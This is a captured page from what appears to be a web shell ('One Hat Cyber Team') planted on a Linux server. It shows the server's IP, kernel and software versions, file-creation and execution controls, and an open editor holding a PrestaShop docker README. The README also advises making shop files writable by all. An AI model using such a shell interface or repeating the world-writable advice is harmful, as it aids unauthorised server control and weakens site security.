⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
docker-templates
/
from-dump
/
Edit File: README.md
# PrestaShop Dump ## What does this folder contain? You can find a docker template for a standalone PrestaShop container, running Apache + MySQL in it. When started, it executes the latest release of PrestaShop 1.7 available on Docker, or the folder specified in the docker-compose.yml file (if modified). ## How to run this shop Run the following command: ``` docker-compose up ``` A pre-installed PrestaShop will be downloaded from Docker hub, and the SQL files available in `bdd` folder will restored in the MySQL database. Once ready, your shop can be reached at the address http://localhost:8081 (default conf). In case of blank page, check the logs displayed on your terminal. The common fixes are: * Giving write permission to all on the PrestaShop files * Dropping the app/cache/* folders in order to remove old config Enjoy!
Simpan